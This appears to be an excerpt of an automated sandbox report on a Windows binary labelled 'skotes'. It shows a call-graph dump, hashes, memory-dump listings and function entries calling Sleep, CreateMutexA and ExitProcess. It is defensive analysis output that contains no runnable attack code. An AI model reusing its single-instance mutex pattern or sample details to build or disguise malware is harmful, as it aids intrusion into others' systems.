628510 12001 62855f 12000->12001 12004 62856c 12000->12004 12006 629d00 12001->12006 12003 6285c4 12004->12003 12027 62a060 12004->12027 12007 629e31 12006->12007 12010 629d25 12006->12010 12008 629270 RtlAllocateHeap 12007->12008 12019 629d8b __cftof 12008->12019 12009 646c6a RtlAllocateHeap 12018 629e3b 12009->12018 12011 629e2c 12010->12011 12013 629da1 12010->12013 12014 629d7a 12010->12014 12012 612480 RtlAllocateHeap 12011->12012 12012->12007 12016 62d3e2 RtlAllocateHeap 12013->12016 12013->12019 12014->12011 12015 629d85 12014->12015 12017 62d3e2 RtlAllocateHeap 12015->12017 12016->12019 12017->12019 12020 629e6a shared_ptr 12018->12020 12021 646c6a RtlAllocateHeap 12018->12021 12019->12009 12022 629dfc shared_ptr __cftof 12019->12022 12020->12004 12023 629e8e 12021->12023 12022->12004 12024 629ec0 shared_ptr 12023->12024 12025 646c6a RtlAllocateHeap 12023->12025 12024->12004 12026 629ee6 12025->12026 12028 62a1b1 12027->12028 12031 62a083 12027->12031 12029 629270 RtlAllocateHeap 12028->12029 12040 62a0e4 __cftof 12029->12040 12030 646c6a RtlAllocateHeap 12039 62a1bb shared_ptr 12030->12039 12032 62a1ac 12031->12032 12034 62a0d3 12031->12034 12035 62a0fd 12031->12035 12033 612480 RtlAllocateHeap 12032->12033 12033->12028 12034->12032 12036 62a0de 12034->12036 12037 62d3e2 RtlAllocateHeap 12035->12037 12035->12040 12038 62d3e2 RtlAllocateHeap 12036->12038 12037->12040 12038->12040 12039->12004 12040->12030 12041 62a16c shared_ptr __cftof 12040->12041 12041->12004 12042 62d111 12044 62d121 12042->12044 12043 62d12a 12044->12043 12046 62d199 12044->12046 12047 62d1a7 SleepConditionVariableCS 12046->12047 12049 62d1c0 12046->12049 12047->12049 12049->12044 12050 61211c 12051 612126 12050->12051 12052 62d64e RtlAllocateHeap 12051->12052 12053 612132 12052->12053 12094 613fe0 12095 614022 12094->12095 12096 6140d2 12095->12096 12097 61408c 12095->12097 12100 614035 __floor_pentium4 12095->12100 12098 613ee0 4 API calls 12096->12098 12101 6135e0 12097->12101 12098->12100 12102 62d3e2 RtlAllocateHeap 12101->12102 12103 613616 12102->12103 12107 61364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 12103->12107 12108 612ce0 12103->12108 12105 61369e 12106 612c00 4 API calls 12105->12106 12105->12107 12106->12107 12107->12100 12109 612d1d 12108->12109 12110 62bedf InitOnceExecuteOnce 12109->12110 12111 612d46 12110->12111 12112 612d51 __floor_pentium4 12111->12112 12113 612d88 12111->12113 12117 62bef7 12111->12117 12112->12105 12115 612440 4 API calls 12113->12115 12116 612d9b 12115->12116 12116->12105 12118 62bf03 12117->12118 12126 612900 12118->12126 12120 62bf23 std::_Throw_future_error 12121 62bf73 12120->12121 12122 62bf6a 12120->12122 12124 612ae0 5 API calls 12121->12124 12136 62be7f 12122->12136 12125 62bf6f 12124->12125 12125->12113 12127 6280c0 RtlAllocateHeap 12126->12127 12128 61294f 12127->12128 12129 6126b0 RtlAllocateHeap 12128->12129 12130 612967 12129->12130 12131 61298d shared_ptr 12130->12131 12132 646c6a RtlAllocateHeap 12130->12132 12131->12120 12133 6129b6 12132->12133 12134 6438af ___std_exception_copy RtlAllocateHeap 12133->12134 12135 6129e4 12134->12135 12135->12120 12137 62cc31 InitOnceExecuteOnce 12136->12137 12138 62be97 12137->12138 12139 62be9e 12138->12139 12140 646cbb 4 API calls 12138->12140 12139->12125 12141 62bea7 12140->12141 12141->12125 12142 628de0 12143 628e05 12142->12143 12144 628f2f 12142->12144 12148 628e76 12143->12148 12149 628e4c 12143->12149 12145 629270 RtlAllocateHeap 12144->12145 12146 628f34 12145->12146 12147 612480 RtlAllocateHeap 12146->12147 12155 628e5d __cftof 12147->12155 12153 62d3e2 RtlAllocateHeap 12148->12153 12148->12155 12149->12146 12150 628e57 12149->12150 12152 62d3e2 RtlAllocateHeap 12150->12152 12151 646c6a RtlAllocateHeap 12154 628f3e 12151->12154 12152->12155 12153->12155 12155->12151 12156 628eed shared_ptr __cftof 12155->12156 12157 6285e0 12158 6285f6 12157->12158 12158->12158 12159 628f40 RtlAllocateHeap 12158->12159 12160 62860b 12158->12160 12159->12160 12161 6155f0 12162 615610 12161->12162 12163 6122c0 4 API calls 12162->12163 12164 615710 __floor_pentium4 12162->12164 12163->12162 12165 6143f0 12166 62bedf InitOnceExecuteOnce 12165->12166 12168 61440a 12166->12168 12167 614411 12168->12167 12169 646cbb 4 API calls 12168->12169 12170 614424 12169->12170 12209 6121c0 12210 6121d0 12209->12210 12211 6121cb 12209->12211 12212 6121d4 12210->12212 12217 6121ec __cftof 12210->12217 12213 6475f6 __dosmaperr RtlAllocateHeap 12212->12213 12214 6121d9 12213->12214 12216 646c5a __cftof RtlAllocateHeap 12214->12216 12215 6121fc __cftof 12218 6121e4 12216->12218 12217->12215 12219 612221 12217->12219 12220 61223a 12217->12220 12222 6475f6 __dosmaperr RtlAllocateHeap 12219->12222 12221 612231 12220->12221 12223 6475f6 __dosmaperr RtlAllocateHeap 12220->12223 12224 612226 12222->12224 12226 612247 12223->12226 12225 646c5a __cftof RtlAllocateHeap 12224->12225 12225->12221 12227 646c5a __cftof RtlAllocateHeap 12226->12227 12228 612252 12227->12228 12234 6279c0 12235 6279e0 12234->12235 12235->12235 12236 6280c0 RtlAllocateHeap 12235->12236 12237 6279f2 12236->12237 12238 6283c0 12239 627760 RtlAllocateHeap 12238->12239 12240 628439 12239->12240 12241 628f40 RtlAllocateHeap 12240->12241 12242 628454 12240->12242 12241->12242 12243 628f40 RtlAllocateHeap 12242->12243 12245 6284a8 12242->12245 12244 6284ee 12243->12244 9818 64a7c8 9819 64a7d2 __dosmaperr 9818->9819 9820 64d82f __dosmaperr RtlAllocateHeap 9819->9820 9826 64a7eb 9819->9826 9821 64a813 __dosmaperr 9820->9821 9822 64a81b __dosmaperr 9821->9822 9823 64a853 9821->9823 9824 64adf5 ___free_lconv_mon RtlAllocateHeap 9822->9824 9825 64a49f __dosmaperr RtlAllocateHeap 9823->9825 9824->9826 9827 64a85e 9825->9827 9828 64adf5 ___free_lconv_mon RtlAllocateHeap 9827->9828 9828->9826 12250 6187d0 12251 6188d3 12250->12251 12259 618819 shared_ptr 12250->12259 12252 6280c0 RtlAllocateHeap 12251->12252 12258 618923 12252->12258 12253 61896c 12254 628200 RtlAllocateHeap 12253->12254 12257 618971 12254->12257 12255 618949 shared_ptr 12256 6280c0 RtlAllocateHeap 12256->12259 12258->12255 12260 646c6a RtlAllocateHeap 12258->12260 12259->12251 12259->12253 12259->12256 12259->12258 12260->12253 12301 619ba5 12302 619ba7 12301->12302 12303 627a00 RtlAllocateHeap 12302->12303 12304 619ca9 12303->12304 12305 615c10 4 API calls 12304->12305 12306 619cb1 12305->12306 12307 618b30 4 API calls 12306->12307 12308 619cc2 12307->12308 12309 628220 RtlAllocateHeap 12308->12309 12310 619cd1 12309->12310 12320 61b7b1 12321 61b7be 12320->12321 12322 627a00 RtlAllocateHeap 12321->12322 12323 61b7f3 12322->12323 12324 627a00 RtlAllocateHeap 12323->12324 12325 61b80b 12324->12325 12326 627a00 RtlAllocateHeap 12325->12326 12327 61b823 12326->12327 12328 627a00 RtlAllocateHeap 12327->12328 12329 61b835 12328->12329 12334 6467b7 12335 6467c3 __cftof 12334->12335 12336 6467cd 12335->12336 12340 6467e2 12335->12340 12337 6475f6 __dosmaperr RtlAllocateHeap 12336->12337 12339 6467d2 12337->12339 12338 6467dd 12341 646c5a __cftof RtlAllocateHeap 12339->12341 12340->12338 12343 646740 12340->12343 12341->12338 12344 646762 12343->12344 12345 64674d 12343->12345 12351 64675d 12344->12351 12359 64a038 12344->12359 12346 6475f6 __dosmaperr RtlAllocateHeap 12345->12346 12348 646752 12346->12348 12350 646c5a __cftof RtlAllocateHeap 12348->12350 12350->12351 12351->12338 12355 646785 12376 64aebb 12355->12376 12358 64adf5 ___free_lconv_mon RtlAllocateHeap 12358->12351 12360 646777 12359->12360 12361 64a050 12359->12361 12365 64b00b 12360->12365 12361->12360 12362 64afe4 RtlAllocateHeap 12361->12362 12363 64a06e 12362->12363 12391 650439 12363->12391 12366 64677f 12365->12366 12367 64b022 12365->12367 12369 64afe4 12366->12369 12367->12366 12368 64adf5 ___free_lconv_mon RtlAllocateHeap 12367->12368 12368->12366 12370 64b005 12369->12370 12371 64aff0 12369->12371 12370->12355 12372 6475f6 __dosmaperr RtlAllocateHeap 12371->12372 12373 64aff5 12372->12373 12374 646c5a __cftof RtlAllocateHeap 12373->12374 12375 64b000 12374->12375 12375->12355 12377 64aecc 12376->12377 12378 64aee1 12376->12378 12380 6475e3 __dosmaperr RtlAllocateHeap 12377->12380 12379 64af2a 12378->12379 12383 64af08 12378->12383 12381 6475e3 __dosmaperr RtlAllocateHeap 12379->12381 12382 64aed1 12380->12382 12384 64af2f 12381->12384 12385 6475f6 __dosmaperr RtlAllocateHeap 12382->12385 12409 64ae2f 12383->12409 12387 6475f6 __dosmaperr RtlAllocateHeap 12384->12387 12388 64678b 12385->12388 12389 64af37 12387->12389 12388->12351 12388->12358 12390 646c5a __cftof RtlAllocateHeap 12389->12390 12390->12388 12392 650445 __cftof 12391->12392 12393 65044d 12392->12393 12398 650465 12392->12398 12395 6475e3 __dosmaperr RtlAllocateHeap 12393->12395 12394 650500 12397 6475e3 __dosmaperr RtlAllocateHeap 12394->12397 12396 650452 12395->12396 12399 6475f6 __dosmaperr RtlAllocateHeap 12396->12399 12400 650505 12397->12400 12398->12394 12404 650497 12398->12404 12407 65045a 12399->12407 12401 6475f6 __dosmaperr RtlAllocateHeap 12400->12401 12402 65050d 12401->12402 12403 646c5a __cftof RtlAllocateHeap 12402->12403 12403->12407 12405 6475f6 __dosmaperr RtlAllocateHeap 12404->12405 12404->12407 12406 6504be 12405->12406 12408 6475e3 __dosmaperr RtlAllocateHeap 12406->12408 12407->12360 12408->12407 12410 64ae3b __cftof 12409->12410 12411 64ae70 12410->12411 12412 64ae7b 12410->12412 12416 64af48 12411->12416 12414 6475f6 __dosmaperr RtlAllocateHeap 12412->12414 12415 64ae76 12414->12415 12415->12388 12427 64c0de 12416->12427 12418 64af58 12419 64af90 12418->12419 12420 64af5e 12418->12420 12421 64c0de RtlAllocateHeap 12418->12421 12419->12420 12422 64c0de RtlAllocateHeap 12419->12422 12423 64afd8 12420->12423 12425 6475c0 __dosmaperr RtlAllocateHeap 12420->12425 12424 64af87 12421->12424 12422->12420 12423->12415 12426 64c0de RtlAllocateHeap 12424->12426 12425->12423 12426->12419 12428 64c100 12427->12428 12429 64c0eb 12427->12429 12431 6475e3 __dosmaperr RtlAllocateHeap 12428->12431 12433 64c125 12428->12433 12430 6475e3 __dosmaperr RtlAllocateHeap 12429->12430 12432 64c0f0 12430->12432 12434 64c130 12431->12434 12435 6475f6 __dosmaperr RtlAllocateHeap 12432->12435 12433->12418 12436 6475f6 __dosmaperr RtlAllocateHeap 12434->12436 12438 64c0f8 12435->12438 12437 64c138 12436->12437 12439 646c5a __cftof RtlAllocateHeap 12437->12439 12438->12418 12439->12438 12440 616db5 12441 616dc2 12440->12441 12442 616df5 12441->12442 12443 616dca 12441->12443 12445 6280c0 RtlAllocateHeap 12442->12445 12444 6280c0 RtlAllocateHeap 12443->12444 12446 616deb shared_ptr 12444->12446 12445->12446 12447 616ec1 shared_ptr 12446->12447 12448 646c6a RtlAllocateHeap 12446->12448 12449 616ee3 12448->12449 12450 648bbe 12451 648868 4 API calls 12450->12451 12452 648bdc 12451->12452 12468 618980 12469 618aea 12468->12469 12476 6189d8 shared_ptr 12468->12476 12470 627a00 RtlAllocateHeap 12470->12476 12471 615c10 4 API calls 12471->12476 12472 618b20 12474 628200 RtlAllocateHeap 12472->12474 12473 6280c0 RtlAllocateHeap 12473->12476 12475 618b25 12474->12475 12477 646c6a RtlAllocateHeap 12475->12477 12476->12469 12476->12470 12476->12471 12476->12472 12476->12473 12476->12475 12478 618b2a 12477->12478 12510 612b90 12511 612bce 12510->12511 12512 62b7fb TpReleaseWork 12511->12512 12513 612bdb shared_ptr __floor_pentium4 12512->12513 12514 613f9f 12515 613fad 12514->12515 12519 613fc5 12514->12519 12516 612410 5 API calls 12515->12516 12517 613fb6 12516->12517 12518 613ce0 RtlAllocateHeap 12517->12518 12518->12519

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 0064652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 358 64652b-646538 call 64a302 361 64655a-64656c call 64656d ExitProcess 358->361 362 64653a-646548 GetPEB 358->362 362->361 364 64654a-646559 362->364 364->361
                                                                                                                                                                    APIs
                                                                                                                                                                    • ExitProcess.KERNEL32(?,?,0064652A,?,?,?,?,?,00647661), ref: 00646567
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                    • Opcode ID: eca42d7d99b22480b7cdae76845be149ba73bf6698123af9d25f9ab9aaffb5ee
                                                                                                                                                                    • Instruction ID: a8c51ac8ca576b924ed37afaa26c31a823bc097d29e06733e9406cc32b81fbd4
                                                                                                                                                                    • Opcode Fuzzy Hash: eca42d7d99b22480b7cdae76845be149ba73bf6698123af9d25f9ab9aaffb5ee
                                                                                                                                                                    • Instruction Fuzzy Hash: 60E08C30041108AFCF3ABB19C84DA883B2AEF42745F401809F80C8A226CB35ED91D682
                                                                                                                                                                    Function 00619BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 22c502b73e9d555cddbb6189e9f3d8d3d87aea878192423b6db85887ea81d564
                                                                                                                                                                    • Instruction ID: 00348f4bb59a2ff93353974a5f500bc14b761d6508fbd147a383974b9d1461b9
                                                                                                                                                                    • Opcode Fuzzy Hash: 22c502b73e9d555cddbb6189e9f3d8d3d87aea878192423b6db85887ea81d564
                                                                                                                                                                    • Instruction Fuzzy Hash: 1A3118317152448BEB08EB78EC997EEB763EB85310F28865DE058973E6C7758AC08761
                                                                                                                                                                    Function 00619F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 22 619f44-619f64 26 619f92-619fae 22->26 27 619f66-619f72 22->27 30 619fb0-619fbc 26->30 31 619fdc-619ffb 26->31 28 619f74-619f82 27->28 29 619f88-619f8f call 62d663 27->29 28->29 34 61a92b 28->34 29->26 36 619fd2-619fd9 call 62d663 30->36 37 619fbe-619fcc 30->37 32 61a029-61a916 call 6280c0 31->32 33 619ffd-61a009 31->33 38 61a00b-61a019 33->38 39 61a01f-61a026 call 62d663 33->39 41 61a953-61a994 Sleep CreateMutexA 34->41 42 61a92b call 646c6a 34->42 36->31 37->34 37->36 38->34 38->39 39->32 52 61a9a7-61a9a8 41->52 53 61a996-61a998 41->53 42->41 53->52 54 61a99a-61a9a5 53->54 54->52
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
